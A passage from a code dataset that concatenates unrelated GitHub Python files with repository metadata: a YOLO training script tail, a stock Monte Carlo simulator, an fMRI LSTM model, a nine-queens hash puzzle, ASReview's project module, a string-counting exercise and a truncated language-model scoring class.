训练结束后会将 anchors, class_types 信息一并存放,所以预测时无需重新加载数据获取这两项信息\n# 如果存在之前的训练文件,会自动加载进行继续训练,并且保存时会覆盖之前的模型\n# 另外这里的 anchor 数量可以自由调整,如果所定位的形状没有太大变化,设置成一个 [[60, 60]] 会节约计算资源\nif __name__ == '__main__':\n xmlpath = './train_img'\n anchors = [[60, 60]]\n train_data, imginfos, class_types = load_voc_data(xmlpath, anchors)\n train(train_data, anchors, class_types)\n\n # testpath = './train_img'\n # state = load_net('net.pkl')\n # v = [os.path.join(testpath, i) for i in os.listdir(testpath) if i.lower().endswith('.jpg') or i.lower().endswith('.png')]\n # v = v[::-1]\n # for i in v:\n # get_all_draw_rects(i, state)\n\n","repo_name":"cilame/any-whim","sub_path":"learn_torch/mini_yolo.py","file_name":"mini_yolo.py","file_ext":"py","file_size_in_byte":19205,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"32"} +{"seq_id":"1284881787","text":"# coding:utf-8\nimport sys\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime\nimport csv\nimport random\nimport math\n\n'''\n第一引数:証券コード 第二引数:何日後か 第三引数:何通り導き出すか\npython japan_stock.py 7203 365 1000\n'''\n\nbase = 'http://info.finance.yahoo.co.jp/history/?code={0}.T&{1}&{2}&tm={3}&p={4}'\ncode = int(sys.argv[1])\nendTime = datetime.now()\nstartTime = datetime(endTime.year - 1, endTime.month, endTime.day)\nstart = 'sy={0}&sm={1}&sd={2}'.format(startTime.year, startTime.month, startTime.day)\nend = 'ey={0}&em={1}&ed={2}'.format(endTime.year, endTime.month, endTime.day)\ninterval = 'd'\np = 1\nresults = []\n\n#過去一年間のデータ取得\nwhile True:\n url = base.format(code, start, end, interval, p)\n tables = pd.read_html(url, header=0)\n if len(tables) < 2 or len(tables[1]) == 0:\n break\n results.append(tables[1])\n p += 1\nresult = pd.concat(results, ignore_index=True)\n\n#以下解析\nresult.columns = ['Date', 'Open', 'High', 'Low', 'Close', 'Volume', 'Adj Close']\nadj_close_rate = result['Adj Close'].pct_change()\nrets = adj_close_rate.dropna()\n\ndef stock_montecarlo(startPrice, days, mu, sigma):\n price = np.zeros(days)\n 
price[0] = startPrice\n drift = mu/days\n for x in range(1,days):\n shock = random.uniform(-1,1) * sigma/math.sqrt(days)\n price[x] = price[x-1] + (price[x-1] * (drift + shock))\n return price\n\nstartPrice = result['Adj Close'].iloc[0]\ndays = int(sys.argv[2])\nmu = rets.mean()\nsigma = rets.std()\nruns = int(sys.argv[3])\nsimulationSave = np.zeros([runs,days])\n\nfor run in range(1,runs):\n stack = stock_montecarlo(startPrice, days, mu, sigma)\n for day in range(1,days):\n simulationSave[run][day] = stack[day - 1]\n\nresult = np.zeros(days)\nfor day in range(1,days):\n\tfor run in range(1,runs):\n\t\tresult[day - 1] += simulationSave[run][day]\n\tresult[day - 1] = result[day - 1]/runs\n\n\n#結果出力 columns出力\n#demo = pd.DataFrame(simulationSave)\n#demo.to_csv('result.csv')\n\ndemo = pd.DataFrame(result)\ndemo.to_csv('result.csv')\n","repo_name":"jphacks-official/KS_1601","sub_path":"scripts/python_stockAnalize/japan_sock.py","file_name":"japan_sock.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11180393976","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom models.layers import GraphConv\nfrom utils.config import args\n\n\nclass LSTM(nn.Module):\n def __init__(self, input_size=48, hidden_dim=16, seq_len=140, num_layers=1,\n output_size=2):\n super().__init__()\n self.hidden_layer_size = hidden_dim\n\n self.lstm_1 = nn.LSTM(input_size, hidden_dim, num_layers, batch_first=True)\n self.lstm_2 = nn.LSTM(hidden_dim, 2, num_layers, batch_first=True)\n # self.lstm = tnn.LSTM(embedding_dim,hidden_dim,n_layer,dropout=drop_prob,batch_first=True,bidirectional=True,bias=True)\n\n self.linear = nn.Linear(seq_len*2, output_size)\n\n # self.hidden_cell = (torch.zeros(num_layers, 1, self.hidden_layer_size),\n # torch.zeros(num_layers, 1, self.hidden_layer_size))\n\n # self.log_softmax = nn.LogSoftmax(dim=1)\n self.CONV = nn.Sequential(\n nn.Conv1d(hidden_dim, hidden_dim, kernel_size=2, padding=3),\n nn.ReLU(),\n nn.MaxPool1d(10)\n # nn.BatchNorm1d(hidden_layer_size)\n )\n self.sig = nn.Sigmoid()\n\n def forward(self, input_seq):\n ### 2 layer LSTM\n # lstm_out, (h, c) = self.lstm_1(input_seq)\n lstm_out, _ = self.lstm_1(input_seq)\n lstm_out_1, _ = self.lstm_2(lstm_out)\n # lstm_out, self.hidden_cell = self.lstm(input_seq.view(len(input_seq), 1, -1), self.hidden_cell)\n # Batch size\n # output, _ = torch.max(lstm_out, 1)\n # print(f\"lstm_out shape {lstm_out.shape}\")\n # print(f\"lstm_out_1 shape {lstm_out_1.shape}\")\n # lstm_out = lstm_out.permute(0, 2, 1)\n # output = self.CONV(lstm_out)\n # print(f\"output shape {output.shape}\")\n output = []\n output = lstm_out_1.reshape(len(input_seq), -1)\n output = self.linear(output)\n output = self.sig(output)\n # output, _ = torch.max(lstm_out, 1)\n ##### CNN LSTM\n # lstm_out, (h, c) = self.lstm_1(input_seq)\n # lstm_out = lstm_out.permute(0, 2, 1)\n # output = self.CONV(lstm_out)\n # output = torch.max(output, 2)[0] # global max for CNN\n # output = self.linear(output)\n # output = self.sig (output)\n\n # Global Max pooling\n\n # output = self.sig(output)\n # print(f\"lstm_out2 shape {lstm_out.shape}\")\n\n return output\n\n # Potential issue with VAE\n # Can't learn the representation to be classified\n # Current analysis strategy\n # ignore the temporal information\n # Try temporal functional connectivity\n # K-means clustering\n # 50 cluster\n # 50 connectivity temporal matrix\n # 100 fc-temporal connectivity as 
the input\n # Try ADHD dataset\n # Check the confusion matrix of SVM\n # Find paper on ADNI dataset\n # Try artificial data having distinct difference\n # Try adding dictinctive feature/noise to the data/functional connectivity to see if the DL model work","repo_name":"l-z-l/DeepL_on_fmri","sub_path":"models/LSTM.py","file_name":"LSTM.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"26656501888","text":"ans = [(None, None)] * 9\nanss = []\n\ndef check_safe(posi, posj) :\n #print(posi, posj)\n '''\n if posj == 0:\n return True\n for (i, j) in ans:\n if i is not None and j is not None:\n if posi == i or posj == j or abs(posi - i) == abs(posj - j):\n return False\n '''\n for j in range(0, posj):\n if posi == ans[j][0] or posj == ans[j][1] or abs(posi - ans[j][0]) == abs(posj - ans[j][1]):\n return False\n return True\n\ndef nine_queens(j):\n #print(j)\n if j == 9:\n anss.append([str(i + 1) for (i, j) in ans])\n return\n for i in range(0, 9):\n if check_safe(i, j):\n ans[j] = (i, j)\n nine_queens(j + 1)\n\nnine_queens(0)\n#print(len(anss), anss)\nanss_str = [''.join(i) for i in anss]\nprint(len(anss_str), anss_str)\n\nimport hashlib\n#s = hashlib.sha1()\nfor code in anss_str:\n s = hashlib.sha1()\n # Repeated update() calls are equivalent to a single call with the concatenation of all the arguments\n s.update(('zWp8LGn01wxJ7' + code + '\\n').encode('utf-8'))\n if s.hexdigest() == 'e48d316ed573d3273931e19f9ac9f9e6039a4242':\n print('answer is ', code)\n# 953172864\n","repo_name":"ryanoasis/demo","sub_path":"python/misc/coolshell_puzzles/7_nqueens.py","file_name":"7_nqueens.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38056259116","text":"__all__ = [\n \"ProjectError\",\n \"ProjectExistsError\",\n \"ProjectNotFoundError\",\n \"open_state\",\n \"ASReviewProject\",\n \"get_project_path\",\n \"project_from_id\",\n \"get_projects\",\n \"is_project\",\n \"is_v0_project\",\n]\n\nimport json\nimport logging\nimport os\nimport shutil\nimport tempfile\nimport time\nimport zipfile\nfrom contextlib import contextmanager\nfrom datetime import datetime\nfrom functools import wraps\nfrom pathlib import Path\nfrom uuid import uuid4\n\nimport jsonschema\nimport numpy as np\nfrom filelock import FileLock\nfrom scipy.sparse import csr_matrix\nfrom scipy.sparse import load_npz\nfrom scipy.sparse import save_npz\n\nfrom asreview._version import get_versions\nfrom asreview.config import LABEL_NA\nfrom asreview.config import PROJECT_MODE_SIMULATE\nfrom asreview.config import PROJECT_MODES\nfrom asreview.config import SCHEMA\nfrom asreview.data import ASReviewData\nfrom asreview.state.errors import StateNotFoundError\nfrom asreview.state.sqlstate import SQLiteState\nfrom asreview.utils import asreview_path\n\nPATH_PROJECT_CONFIG = \"project.json\"\nPATH_PROJECT_CONFIG_LOCK = \"project.json.lock\"\nPATH_FEATURE_MATRICES = \"feature_matrices\"\n\n\nclass ProjectError(Exception):\n pass\n\n\nclass ProjectExistsError(Exception):\n pass\n\n\nclass ProjectNotFoundError(Exception):\n pass\n\n\ndef get_project_path(folder_id):\n \"\"\"Get the project directory.\n\n Arguments\n ---------\n folder_id: str\n The id of the folder containing a project. If there is no\n authentication, the folder_id is equal to the project_id. 
Otherwise,\n this is equal to {project_owner_id}_{project_id}.\n \"\"\"\n return Path(asreview_path(), folder_id)\n\n\ndef project_from_id(f):\n \"\"\"Decorator function that takes a user account as parameter,\n the user account is used to get the correct sub folder in which\n the projects is\n \"\"\"\n\n @wraps(f)\n def decorated_function(project_id, *args, **kwargs):\n project_path = get_project_path(project_id)\n if not is_project(project_path):\n raise ProjectNotFoundError(f\"Project '{project_id}' not found\")\n project = ASReviewProject(project_path, project_id=project_id)\n return f(project, *args, **kwargs)\n\n return decorated_function\n\n\ndef get_projects(project_paths=None):\n \"\"\"Get the ASReview projects at the given paths.\n\n Arguments\n ---------\n project_paths : list[Path], optional\n List of paths to projects. By default all the projects in the asreview\n folder are used, by default None\n\n Returns\n -------\n list[ASReviewProject]\n Projects at the given project paths.\n \"\"\"\n if project_paths is None:\n project_paths = [path for path in asreview_path().iterdir() if path.is_dir()]\n\n return [ASReviewProject(project_path) for project_path in project_paths]\n\n\ndef is_project(project_path):\n project_path = Path(project_path) / PATH_PROJECT_CONFIG\n\n return project_path.exists()\n\n\ndef is_v0_project(project_path):\n \"\"\"Check if a project file is of a ASReview version 0 project.\"\"\"\n\n return not Path(project_path, \"reviews\").exists()\n\n\n@contextmanager\ndef open_state(asreview_obj, review_id=None, read_only=True):\n \"\"\"Initialize a state class instance from a project folder.\n\n Arguments\n ---------\n asreview_obj: str/pathlike/ASReviewProject\n Filepath to the (unzipped) project folder or ASReviewProject object.\n review_id: str\n Identifier of the review from which the state will be instantiated.\n If none is given, the first review in the reviews folder will be taken.\n read_only: bool\n Whether to open in read_only mode.\n\n Returns\n -------\n SQLiteState\n \"\"\"\n\n # Unzip the ASReview data if needed.\n if isinstance(asreview_obj, ASReviewProject):\n project = asreview_obj\n elif zipfile.is_zipfile(asreview_obj) and Path(asreview_obj).suffix == \".asreview\":\n if not read_only:\n raise ValueError(\"ASReview files do not support not read only files.\")\n\n # work from a temp dir\n tmpdir = tempfile.TemporaryDirectory()\n project = ASReviewProject.load(asreview_obj, tmpdir.name)\n else:\n project = ASReviewProject(asreview_obj)\n\n # init state class\n state = SQLiteState(read_only=read_only)\n\n try:\n if len(project.reviews) > 0:\n if review_id is None:\n review_id = project.config[\"reviews\"][0][\"id\"]\n logging.debug(f\"Opening review {review_id}.\")\n state._restore(project.project_path, review_id)\n elif len(project.reviews) == 0 and not read_only:\n review_id = uuid4().hex\n logging.debug(f\"Create new review (state) with id {review_id}.\")\n state._create_new_state_file(project.project_path, review_id)\n project.add_review(review_id)\n else:\n raise StateNotFoundError(\n \"State file does not exist, and in \" \"read only mode.\"\n )\n yield state\n finally:\n try:\n state.close()\n except AttributeError:\n # file seems to be closed, do nothing\n pass\n\n\nclass ASReviewProject:\n \"\"\"Project class for ASReview project files.\"\"\"\n\n def __init__(self, project_path, project_id=None):\n self.project_path = Path(project_path)\n self.project_id = project_id\n\n @classmethod\n def create(\n cls,\n project_path,\n 
project_id=None,\n project_mode=\"oracle\",\n project_name=None,\n project_description=None,\n project_authors=None,\n ):\n \"\"\"Initialize the necessary files specific to the web app.\"\"\"\n\n project_path = Path(project_path)\n\n if is_project(project_path):\n raise ProjectExistsError(\"Project already exists.\")\n\n if project_mode not in PROJECT_MODES:\n raise ValueError(\n f\"Project mode '{project_mode}' is not in \" f\"{PROJECT_MODES}.\"\n )\n\n if project_id is None:\n project_id = project_path.stem\n\n if project_name is None:\n project_name = project_path.stem\n\n if project_path.is_dir():\n raise IsADirectoryError(f\"Project folder {project_path} already exists.\")\n\n try:\n project_path.mkdir(parents=True, exist_ok=True)\n Path(project_path, \"data\").mkdir(exist_ok=True)\n Path(project_path, PATH_FEATURE_MATRICES).mkdir(exist_ok=True)\n Path(project_path, \"reviews\").mkdir(exist_ok=True)\n\n config = {\n \"version\": get_versions()[\"version\"],\n \"id\": project_id,\n \"mode\": project_mode,\n \"name\": project_name,\n \"description\": project_description,\n \"authors\": project_authors,\n \"created_at_unix\": int(time.time()),\n \"datetimeCreated\": str(datetime.now()),\n \"reviews\": [],\n \"feature_matrices\": [],\n }\n\n # validate new config before storing\n jsonschema.validate(instance=config, schema=SCHEMA)\n\n project_fp = Path(project_path, PATH_PROJECT_CONFIG)\n project_fp_lock = Path(project_path, PATH_PROJECT_CONFIG_LOCK)\n lock = FileLock(project_fp_lock, timeout=3)\n\n # create a file with project info\n with lock:\n with open(project_fp, \"w\") as f:\n json.dump(config, f)\n\n except Exception as err:\n # remove all generated folders and raise error\n shutil.rmtree(project_path)\n raise err\n\n return cls(project_path, project_id=project_id)\n\n @property\n def config(self):\n try:\n return self._config\n except AttributeError:\n project_fp = Path(self.project_path, PATH_PROJECT_CONFIG)\n project_fp_lock = Path(self.project_path, PATH_PROJECT_CONFIG_LOCK)\n lock = FileLock(project_fp_lock, timeout=3)\n\n try:\n with lock:\n # read the file with project info\n with open(project_fp, \"r\") as fp:\n config = json.load(fp)\n self._config = config\n\n return config\n\n except FileNotFoundError:\n raise ProjectNotFoundError(f\"Project '{self.project_path}' not found\")\n\n @config.setter\n def config(self, config):\n project_fp = Path(self.project_path, PATH_PROJECT_CONFIG)\n project_fp_lock = Path(self.project_path, PATH_PROJECT_CONFIG_LOCK)\n lock = FileLock(project_fp_lock, timeout=3)\n\n with lock:\n with open(project_fp, \"w\") as f:\n json.dump(config, f)\n\n self._config = config\n\n def update_config(self, **kwargs):\n \"\"\"Update project info\"\"\"\n\n kwargs_copy = kwargs.copy()\n\n # validate schema\n if \"mode\" in kwargs_copy and kwargs_copy[\"mode\"] not in PROJECT_MODES:\n raise ValueError(\"Project mode '{}' not found.\".format(kwargs_copy[\"mode\"]))\n\n # update project file\n config = self.config\n config.update(kwargs_copy)\n\n # validate new config before storing\n jsonschema.validate(instance=config, schema=SCHEMA)\n\n self.config = config\n return config\n\n def add_dataset(self, file_name):\n \"\"\"Add file path to the project file.\n\n Add file to data subfolder and fill the pool of iteration 0.\n \"\"\"\n self.update_config(dataset_path=file_name)\n\n # fill the pool of the first iteration\n fp_data = Path(self.project_path, \"data\", self.config[\"dataset_path\"])\n as_data = ASReviewData.from_file(fp_data)\n\n with 
open_state(self.project_path, read_only=False) as state:\n # save the record ids in the state file\n state.add_record_table(as_data.record_ids)\n\n # if the data contains labels, add them to the state file\n if (\n self.config[\"mode\"] != PROJECT_MODE_SIMULATE\n and as_data.labels is not None\n ):\n labeled_indices = np.where(as_data.labels != LABEL_NA)[0]\n labels = as_data.labels[labeled_indices].tolist()\n labeled_record_ids = as_data.record_ids[labeled_indices].tolist()\n\n # add the labels as prior data\n state.add_labeling_data(\n record_ids=labeled_record_ids,\n labels=labels,\n notes=[None for _ in labeled_record_ids],\n prior=True,\n )\n\n def remove_dataset(self):\n \"\"\"Remove dataset from project.\"\"\"\n # reset dataset_path\n self.update_config(dataset_path=None)\n\n # remove datasets from project\n shutil.rmtree(Path(self.project_path, \"data\"))\n\n # remove state file if present\n if Path(self.project_path, \"reviews\").is_dir() and any(\n Path(self.project_path, \"reviews\").iterdir()\n ):\n self.delete_review()\n\n def clean_tmp_files(self):\n \"\"\"Clean temporary files in a project.\n\n Arguments\n ---------\n project_id: str\n The id of the current project.\n \"\"\"\n\n # clean pickle files\n for f_pickle in self.project_path.rglob(\"*.pickle\"):\n try:\n os.remove(f_pickle)\n except OSError as e:\n print(f\"Error: {f_pickle} : {e.strerror}\")\n\n @property\n def feature_matrices(self):\n try:\n return self.config[\"feature_matrices\"]\n except Exception:\n return []\n\n def add_feature_matrix(self, feature_matrix, feature_extraction_method):\n \"\"\"Add feature matrix to project file.\n\n Arguments\n ---------\n feature_matrix: numpy.ndarray, scipy.sparse.csr.csr_matrix\n The feature matrix to add to the project file.\n feature_extraction_method: str\n Name of the feature extraction method.\n \"\"\"\n # Make sure the feature matrix is in csr format.\n if isinstance(feature_matrix, np.ndarray):\n feature_matrix = csr_matrix(feature_matrix)\n if not isinstance(feature_matrix, csr_matrix):\n raise ValueError(\n \"The feature matrix should be convertible to type \"\n \"scipy.sparse.csr.csr_matrix.\"\n )\n\n matrix_filename = f\"{feature_extraction_method}_feature_matrix.npz\"\n save_npz(\n Path(self.project_path, PATH_FEATURE_MATRICES, matrix_filename),\n feature_matrix,\n )\n\n # Add the feature matrix to the project config.\n config = self.config\n\n feature_matrix_config = {\n \"id\": feature_extraction_method,\n \"filename\": matrix_filename,\n }\n\n # Add container for feature matrices.\n if \"feature_matrices\" not in config:\n config[\"feature_matrices\"] = []\n\n config[\"feature_matrices\"].append(feature_matrix_config)\n\n self.config = config\n\n def get_feature_matrix(self, feature_extraction_method):\n \"\"\"Get the feature matrix from the project file.\n\n Arguments\n ---------\n feature_extraction_method: str\n Name of the feature extraction method for which to get the matrix.\n\n Returns\n -------\n scipy.sparse.csr_matrix:\n Feature matrix in sparse format.\n \"\"\"\n matrix_filename = f\"{feature_extraction_method}_feature_matrix.npz\"\n return load_npz(Path(self.project_path, PATH_FEATURE_MATRICES, matrix_filename))\n\n @property\n def reviews(self):\n try:\n return self.config[\"reviews\"]\n except Exception:\n return []\n\n def add_review(self, review_id, start_time=None, status=\"setup\"):\n \"\"\"Add new review metadata.\n\n Arguments\n ---------\n review_id: str\n The review_id uuid4.\n status: str\n The status of the review. 
One of 'setup', 'running',\n 'finished'.\n start_time:\n Start of the review.\n\n \"\"\"\n if start_time is None:\n start_time = datetime.now()\n\n # Add the review to the project.\n config = self.config\n\n review_config = {\n \"id\": review_id,\n \"start_time\": str(start_time),\n \"status\": status\n # \"end_time\": datetime.now()\n }\n\n # add container for reviews\n if \"reviews\" not in config:\n config[\"reviews\"] = []\n\n config[\"reviews\"].append(review_config)\n\n self.config = config\n\n def update_review(self, review_id=None, **kwargs):\n \"\"\"Update review metadata.\n\n Arguments\n ---------\n review_id: str\n The review_id uuid4. Default None, which is the\n first added review.\n status: str\n The status of the review. One of 'setup', 'running',\n 'finished'.\n start_time:\n Start of the review.\n end_time: End time of the review.\n \"\"\"\n\n # read the file with project info\n config = self.config\n\n if review_id is None:\n review_index = 0\n else:\n review_index = [x[\"id\"] for x in self.config[\"reviews\"]].index(review_id)\n\n review_config = config[\"reviews\"][review_index]\n review_config.update(kwargs)\n\n config[\"reviews\"][review_index] = review_config\n\n # update the file with project info\n self.config = config\n\n def delete_review(self, remove_folders=False):\n try:\n # remove the folder tree\n shutil.rmtree(Path(self.project_path, PATH_FEATURE_MATRICES))\n\n # recreate folder structure if True\n if not remove_folders:\n Path(self.project_path, PATH_FEATURE_MATRICES).mkdir(exist_ok=True)\n except Exception:\n print(\"Failed to remove feature matrices.\")\n\n try:\n path_review = Path(self.project_path, \"reviews\")\n shutil.rmtree(path_review)\n if not remove_folders:\n Path(self.project_path, \"reviews\").mkdir(exist_ok=True)\n except Exception:\n print(\"Failed to remove sql database.\")\n\n # update the config\n self.update_config(**{\"reviews\": [], \"feature_matrices\": []})\n\n def mark_review_finished(self, review_id=None):\n \"\"\"Mark a review in the project as finished.\n\n If no review_id is given, mark the first review as finished.\n\n Arguments\n ---------\n review_id: str\n Identifier of the review to mark as finished.\n \"\"\"\n\n self.update_review(\n review_id=review_id, status=\"finished\", end_time=str(datetime.now())\n )\n\n def export(self, export_fp):\n if Path(export_fp).suffix != \".asreview\":\n raise ValueError(\"Export file should have .asreview extension.\")\n\n if Path(export_fp) == Path(self.project_path):\n raise ValueError(\"export_fp should not be identical to project path.\")\n\n export_fp_tmp = Path(export_fp).with_suffix(\".asreview.zip\")\n\n # copy the source tree, but ignore pickle files\n shutil.copytree(\n self.project_path,\n export_fp_tmp,\n ignore=shutil.ignore_patterns(\"*.pickle\", \"*.lock\"),\n )\n\n # create the archive\n shutil.make_archive(export_fp_tmp, \"zip\", root_dir=export_fp_tmp)\n\n # remove the unzipped folder and move zip\n shutil.rmtree(export_fp_tmp)\n shutil.move(f\"{export_fp_tmp}.zip\", export_fp)\n\n @classmethod\n def load(cls, asreview_file, project_path, safe_import=False):\n tmpdir = tempfile.TemporaryDirectory().name\n\n try:\n # Unzip the project file\n with zipfile.ZipFile(asreview_file, \"r\") as zip_obj:\n zip_filenames = zip_obj.namelist()\n\n # raise error if no ASReview project file\n if PATH_PROJECT_CONFIG not in zip_filenames:\n raise ValueError(\"Project file is not valid project.\")\n\n # extract all files to folder\n for f in zip_filenames:\n if not 
f.endswith(\".pickle\"):\n zip_obj.extract(f, path=tmpdir)\n\n except zipfile.BadZipFile:\n raise ValueError(\"File is not an ASReview file.\")\n\n with open(Path(tmpdir, PATH_PROJECT_CONFIG), \"r\") as f:\n project_config = json.load(f)\n\n if safe_import:\n # assign a new id to the project.\n project_config[\"id\"] = uuid4().hex\n with open(Path(tmpdir, PATH_PROJECT_CONFIG), \"r+\") as f:\n # write to file\n f.seek(0)\n json.dump(project_config, f)\n f.truncate()\n\n # location to copy file to\n # Move the project from the temp folder to the projects folder.\n os.replace(tmpdir, Path(project_path, project_config[\"id\"]))\n\n return cls(Path(project_path, project_config[\"id\"]))\n\n def set_error(self, err, save_error_message=True):\n err_type = type(err).__name__\n self.update_review(status=\"error\")\n\n # write error to file if label method is prior (first iteration)\n if save_error_message:\n message = {\n \"message\": f\"{err_type}: {err}\",\n \"type\": f\"{err_type}\",\n \"datetime\": str(datetime.now()),\n }\n\n with open(Path(self.project_path, \"error.json\"), \"w\") as f:\n json.dump(message, f)\n\n def remove_error(self, status):\n error_path = self.project_path / \"error.json\"\n if error_path.exists():\n try:\n os.remove(error_path)\n except Exception as err:\n raise ValueError(f\"Failed to clear the error. {err}\")\n self.update_review(status=status)\n","repo_name":"asreview/asreview","sub_path":"asreview/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":19999,"program_lang":"python","lang":"en","doc_type":"code","stars":500,"dataset":"github-code","pt":"32"} +{"seq_id":"14383298882","text":"# your code goes here\nfrom collections import defaultdict\n\ndef beauty(s):\n d = defaultdict(int)\n d[(0,0)]=1\n count_a = 0\n count_b = 0\n count_c = 0\n res=0\n for char in s:\n if char == 'a':\n count_a+=1\n elif char=='b':\n count_b+=1\n elif char=='c':\n count_c+=1\n\n key = (count_a - count_b,count_b - count_c)\n\n res+=d[key]\n d[key]+=1\n \n return res\n\nt = int(input())\nfor i in range(t):\n svar = input()\n print(beauty(svar))","repo_name":"gbrahmam/DSA-practise","sub_path":"Beautiful String.py","file_name":"Beautiful String.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"16584412805","text":"import torch\nimport copy\nfrom transformers import AutoTokenizer, AutoModelForCausalLM, AutoModelForSeq2SeqLM, LogitsProcessorList\n\nfrom collections import namedtuple\n\nfrom .base_distribution import BaseDistribution\nfrom disco.utils.helpers import get_token_first_indices\n\n\nTextSample = namedtuple('TextSample', ['token_ids', 'text'])\n\nclass LMDistribution(BaseDistribution):\n \"\"\"\n Language model distribution class, a core class for all NLP\n use-cases, relying on Huggingface's Transformers library.\n \"\"\"\n\n def __init__(self,\n model=\"gpt2\", tokenizer=None, auto=AutoModelForCausalLM, freeze=True,\n length=40, device=\"cpu\",\n **config\n ):\n \"\"\"\n Parameters\n ----------\n model: string\n Transformers' name of a causal or seq2seq language model\n tokenizer: string\n Transformers' name for the related tokenizer\n auto: class\n auto class from Transformers, default is AutoModelForCausalLM\n but AutoModelForSeq2SeqLM is also valid\n freeze: boolean\n flag to eventually (not) freeze the network's parameters\n length: int\n number of tokens in the samples\n device: string\n reference of the computing device\n config: kwarg\n parameters 
and values passed to transformers' ```generate(…)```\n \"\"\"\n\n self.tokenizer= AutoTokenizer.from_pretrained(tokenizer if tokenizer else model)\n assert auto in [AutoModelForCausalLM, AutoModelForSeq2SeqLM], \"only AutoModel, AutoModelForCausalLM and AutoModelForSeq2SeqLM are valid options.\"\n self._load_network(auto, model)\n\n self.device = device\n self.network.to(self.device)\n self.network.eval() # to make sure scoring is consistent\n if freeze:\n self.freeze(True)\n\n self.length = length\n\n default_params = {\n \"top_k\": 0,\n \"top_p\": 1.0,\n \"typical_p\": 1.0,\n \"temperature\": 1.0,\n \"num_beams\": 1\n }\n self.params = default_params.copy()\n self.params.update(config)\n\n self.scorable = True if all(\\\n [default_params[k] == self.params[k] for k in default_params.keys()]\\\n ) else False\n\n def _load_network(self, auto, model):\n self.network = auto.from_pretrained(model)\n if not self.network.config.is_encoder_decoder:\n self.tokenizer.pad_token = self.tokenizer.eos_token\n self.network.config.pad_token_id = self.tokenizer.eos_token_id\n\n def to(self, device):\n self.device = device\n self.network.to(self.device)\n\n def freeze(self, frozen=True):\n \"\"\"Freeze (or unfreeze) parameters for gradient computation.\n\n Parameters\n ----------\n frozen: boolean (True)\n state to transition to, default is to freeze\n \"\"\"\n\n self.network.requires_grad_(not frozen)\n\n def log_score(self, samples, context=\"\", grad=False, sum=True):\n \"\"\"Computes log-probabilities for the samples according\n to the language model network in the given context\n\n Parameters\n ----------\n samples: list(Sample)\n samples to (log-)score as a list()\n context: text\n context for which to (log-)score the samples\n grad: boolean\n flag to eventually compute the gradients, e.g. 
when fitting\n sum: boolean\n flag to eventually return token-level tensor of scores\n\n Returns\n -------\n tensor of log-probabilities\n \"\"\"\n assert self.scorable, \"this distribution's parameters make it unscorable.\"\n shapes = set([s.token_ids.shape for s in samples])\n assert 1 == len(shapes), \"sequences of token_ids should have the same shape, but got: {shapes}.\"\n\n if self.network.config.is_encoder_decoder:\n assert context is not None and context != \"\", \"context (encoder input) is mandatory for encoder-decoder models\"\n elif not context:\n context = self.tokenizer.bos_token\n\n tokenized_context = self.tokenizer([context] * len(samples), return_tensors=\"pt\", add_special_tokens=True)\n tokenized_context[\"input_ids\"] = tokenized_context[\"input_ids\"].to(self.device)\n tokenized_context[\"attention_mask\"] = tokenized_context[\"attention_mask\"].to(self.device)\n\n tokenized_samples = dict()\n tokenized_samples[\"input_ids\"] = torch.stack([sample.token_ids for sample in samples]).to(self.device)\n\n tokenized_samples = self._discount_padding_tokens(tokenized_samples)\n\n input_ids, encoder_input_ids, forward_kwargs, labels, prompt_length, last = \\\n self._get_forward_inputs(tokenized_context, tokenized_samples, samples)\n\n if grad:\n outputs = self.network(**forward_kwargs, labels=labels)\n else:\n with torch.no_grad():\n outputs = self.network(**forward_kwargs, labels=labels)\n\n all_logits = outputs.logits[:, prompt_length:last, :] # [n_samples, length, vocab]\n\n all_logits = self._process_and_warp_logits(all_logits, input_ids, encoder_input_ids)\n\n all_logprobs = all_logits.log_softmax(-1)\n\n seq_logprobs = torch.gather(\n all_logprobs, 2, tokenized_samples[\"input_ids\"][:, :, None]\n ).squeeze(-1) # [n_samples, length]\n\n seq_logprobs = torch.where(1 == tokenized_samples[\"attention_mask\"], seq_logprobs, torch.tensor(0.).to(self.device))\n\n return seq_logprobs.sum(dim=1) if sum else seq_logprobs\n\n def _discount_padding_tokens(self, tokenized_samples):\n first_eos_indices = get_token_first_indices(\n tokenized_samples[\"input_ids\"],\n self.tokenizer.eos_token_id\n )\n tokenized_samples[\"attention_mask\"] = torch.where(\n self.tokenizer.pad_token_id == tokenized_samples[\"input_ids\"],\n 0, 1\n )\n for i, ix in enumerate(first_eos_indices):\n if None != self.network.config.forced_bos_token_id and\\\n self.network.config.forced_bos_token_id == tokenized_samples[\"input_ids\"][i][0]:\n tokenized_samples[\"attention_mask\"][i][0] = 0\n else:\n tokenized_samples[\"attention_mask\"][i][0] = 1 # at least score one token\n if ix != -1: # if there is an pad token\n tokenized_samples[\"attention_mask\"][i][ix] = 1 # score first pad token\n tokenized_samples[\"attention_mask\"][i][ix + 1:] = 0 # ignore everything after it\n tokenized_samples[\"attention_mask\"] = tokenized_samples[\"attention_mask\"].to(self.device)\n return tokenized_samples\n\n\n def _get_forward_inputs(self, tokenized_context, tokenized_samples, samples):\n if self.network.config.is_encoder_decoder:\n prompt_length = None\n last = -1\n encoder_input_ids = tokenized_context[\"input_ids\"]\n input_ids = tokenized_samples[\"input_ids\"]\n forward_kwargs = {\n \"input_ids\": encoder_input_ids,\n \"decoder_input_ids\": input_ids,\n }\n input_ids, forward_kwargs = self.network._prepare_decoder_input_ids_for_generation(len(samples),\n \"decoder_input_ids\",\n forward_kwargs)\n forward_kwargs['decoder_input_ids'] = input_ids\n labels = forward_kwargs[\"decoder_input_ids\"]\n else:\n prompt_length = 
